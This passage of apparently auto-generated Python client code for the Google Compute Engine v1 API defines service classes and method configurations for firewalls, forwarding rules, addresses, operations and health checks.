request_type_name=u'ComputeFirewallsGetRequest',
response_type_name=u'Firewall',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a firewall rule in the specified project using the data included in the request.
Args:
request: (ComputeFirewallsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.firewalls.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls',
request_field=u'firewall',
request_type_name=u'ComputeFirewallsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of firewall rules available to the specified project.
Args:
request: (ComputeFirewallsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(FirewallList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.firewalls.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/firewalls',
request_field='',
request_type_name=u'ComputeFirewallsListRequest',
response_type_name=u'FirewallList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified firewall rule with the data included in the request. Using PUT method, can only update following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags. This method supports patch semantics.
Args:
request: (ComputeFirewallsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.firewalls.patch',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field=u'firewallResource',
request_type_name=u'ComputeFirewallsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified firewall rule with the data included in the request. Using PUT method, can only update following fields of firewall rule: allowed, description, sourceRanges, sourceTags, targetTags.
Args:
request: (ComputeFirewallsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.firewalls.update',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field=u'firewallResource',
request_type_name=u'ComputeFirewallsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class ForwardingRulesService(base_api.BaseApiService):
"""Service class for the forwardingRules resource."""
_NAME = u'forwardingRules'
def __init__(self, client):
super(ComputeV1.ForwardingRulesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of forwarding rules.
Args:
request: (ComputeForwardingRulesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/forwardingRules',
request_field='',
request_type_name=u'ComputeForwardingRulesAggregatedListRequest',
response_type_name=u'ForwardingRuleAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified ForwardingRule resource.
Args:
request: (ComputeForwardingRulesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.forwardingRules.delete',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeForwardingRulesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified ForwardingRule resource.
Args:
request: (ComputeForwardingRulesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRule) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.get',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeForwardingRulesGetRequest',
response_type_name=u'ForwardingRule',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a ForwardingRule resource in the specified project and region using the data included in the request.
Args:
request: (ComputeForwardingRulesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules',
request_field=u'forwardingRule',
request_type_name=u'ComputeForwardingRulesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of ForwardingRule resources available to the specified project and region.
Args:
request: (ComputeForwardingRulesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.forwardingRules.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/forwardingRules',
request_field='',
request_type_name=u'ComputeForwardingRulesListRequest',
response_type_name=u'ForwardingRuleList',
supports_download=False,
)
def SetTarget(self, request, global_params=None):
"""Changes target URL for forwarding rule. The new target should be of the same type as the old target.
Args:
request: (ComputeForwardingRulesSetTargetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTarget')
return self._RunMethod(
config, request, global_params=global_params)
SetTarget.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.forwardingRules.setTarget',
ordered_params=[u'project', u'region', u'forwardingRule'],
path_params=[u'forwardingRule', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}/setTarget',
request_field=u'targetReference',
request_type_name=u'ComputeForwardingRulesSetTargetRequest',
response_type_name=u'Operation',
supports_download=False,
)
class GlobalAddressesService(base_api.BaseApiService):
"""Service class for the globalAddresses resource."""
_NAME = u'globalAddresses'
def __init__(self, client):
super(ComputeV1.GlobalAddressesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified address resource.
Args:
request: (ComputeGlobalAddressesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalAddresses.delete',
ordered_params=[u'project', u'address'],
path_params=[u'address', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/addresses/{address}',
request_field='',
request_type_name=u'ComputeGlobalAddressesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified address resource. Get a list of available addresses by making a list() request.
Args:
request: (ComputeGlobalAddressesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Address) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalAddresses.get',
ordered_params=[u'project', u'address'],
path_params=[u'address', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/addresses/{address}',
request_field='',
request_type_name=u'ComputeGlobalAddressesGetRequest',
response_type_name=u'Address',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an address resource in the specified project using the data included in the request.
Args:
request: (ComputeGlobalAddressesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalAddresses.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/addresses',
request_field=u'address',
request_type_name=u'ComputeGlobalAddressesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of global addresses.
Args:
request: (ComputeGlobalAddressesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalAddresses.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/addresses',
request_field='',
request_type_name=u'ComputeGlobalAddressesListRequest',
response_type_name=u'AddressList',
supports_download=False,
)
class GlobalForwardingRulesService(base_api.BaseApiService):
"""Service class for the globalForwardingRules resource."""
_NAME = u'globalForwardingRules'
def __init__(self, client):
super(ComputeV1.GlobalForwardingRulesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified GlobalForwardingRule resource.
Args:
request: (ComputeGlobalForwardingRulesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalForwardingRules.delete',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified GlobalForwardingRule resource. Get a list of available forwarding rules by making a list() request.
Args:
request: (ComputeGlobalForwardingRulesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRule) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalForwardingRules.get',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesGetRequest',
response_type_name=u'ForwardingRule',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a GlobalForwardingRule resource in the specified project using the data included in the request.
Args:
request: (ComputeGlobalForwardingRulesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules',
request_field=u'forwardingRule',
request_type_name=u'ComputeGlobalForwardingRulesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of GlobalForwardingRule resources available to the specified project.
Args:
request: (ComputeGlobalForwardingRulesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalForwardingRules.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/forwardingRules',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesListRequest',
response_type_name=u'ForwardingRuleList',
supports_download=False,
)
def SetTarget(self, request, global_params=None):
"""Changes target URL for the GlobalForwardingRule resource. The new target should be of the same type as the old target.
Args:
request: (ComputeGlobalForwardingRulesSetTargetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTarget')
return self._RunMethod(
config, request, global_params=global_params)
SetTarget.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.setTarget',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}/setTarget',
request_field=u'targetReference',
request_type_name=u'ComputeGlobalForwardingRulesSetTargetRequest',
response_type_name=u'Operation',
supports_download=False,
)
class GlobalOperationsService(base_api.BaseApiService):
"""Service class for the globalOperations resource."""
_NAME = u'globalOperations'
def __init__(self, client):
super(ComputeV1.GlobalOperationsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of all operations.
Args:
request: (ComputeGlobalOperationsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/operations',
request_field='',
request_type_name=u'ComputeGlobalOperationsAggregatedListRequest',
response_type_name=u'OperationAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Operations resource.
Args:
request: (ComputeGlobalOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeGlobalOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalOperations.delete',
ordered_params=[u'project', u'operation'],
path_params=[u'operation', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/operations/{operation}',
request_field='',
request_type_name=u'ComputeGlobalOperationsDeleteRequest',
response_type_name=u'ComputeGlobalOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified Operations resource. Get a list of operations by making a list() request.
Args:
request: (ComputeGlobalOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.get',
ordered_params=[u'project', u'operation'],
path_params=[u'operation', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/operations/{operation}',
request_field='',
request_type_name=u'ComputeGlobalOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified project.
Args:
request: (ComputeGlobalOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/operations',
request_field='',
request_type_name=u'ComputeGlobalOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class HealthChecksService(base_api.BaseApiService):
"""Service class for the healthChecks resource."""
_NAME = u'healthChecks'
def __init__(self, client):
super(ComputeV1.HealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HealthCheck resource.
Args:
request: (ComputeHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.healthChecks.delete',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field='',
request_type_name=u'ComputeHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HealthCheck resource. Get a list of available health checks by making a list() request.
Args:
request: (ComputeHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.healthChecks.get',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field='',
request_type_name=u'ComputeHealthChecksGetRequest',
response_type_name=u'HealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.healthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks',
request_field=u'healthCheck',
request_type_name=u'ComputeHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HealthCheck resources available to the specified project.
Args:
request: (ComputeHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.healthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/healthChecks',
request_field='',
request_type_name=u'ComputeHealthChecksListRequest',
response_type_name=u'HealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.healthChecks.patch',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field=u'healthCheckResource',
request_type_name=u'ComputeHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.healthChecks.update',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field=u'healthCheckResource',
request_type_name=u'ComputeHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class HttpHealthChecksService(base_api.BaseApiService):
"""Service class for the httpHealthChecks resource."""
_NAME = u'httpHealthChecks'
def __init__(self, client):
super(ComputeV1.HttpHealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HttpHealthCheck resource.
Args:
request: (ComputeHttpHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.httpHealthChecks.delete',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HttpHealthCheck resource. Get a list of available HTTP health checks by making a list() request.
Args:
request: (ComputeHttpHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpHealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpHealthChecks.get',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpHealthChecksGetRequest',
response_type_name=u'HttpHealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpHealthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field=u'httpHealthCheck',
request_type_name=u'ComputeHttpHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HttpHealthCheck resources available to the specified project.
Args:
request: (ComputeHttpHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpHealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpHealthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field='',
request_type_name=u'ComputeHttpHealthChecksListRequest',
response_type_name=u'HttpHealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHttpHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.httpHealthChecks.patch',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.httpHealthChecks.update',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class HttpsHealthChecksService(base_api.BaseApiService):
"""Service class for the httpsHealthChecks resource."""
_NAME = u'httpsHealthChecks'
def __init__(self, client):
super(ComputeV1.HttpsHealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HttpsHealthCheck resource.
Args:
request: (ComputeHttpsHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.httpsHealthChecks.delete',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HttpsHealthCheck resource. Get a list of available HTTPS health checks by making a list() request.
Args:
request: (ComputeHttpsHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpsHealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpsHealthChecks.get',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksGetRequest',
response_type_name=u'HttpsHealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HttpsHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpsHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpsHealthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks',
request_field=u'httpsHealthCheck',
request_type_name=u'ComputeHttpsHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HttpsHealthCheck resources available to the specified project.
Args:
request: (ComputeHttpsHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpsHealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpsHealthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/httpsHealthChecks',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksListRequest',
response_type_name=u'HttpsHealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HttpsHealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHttpsHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
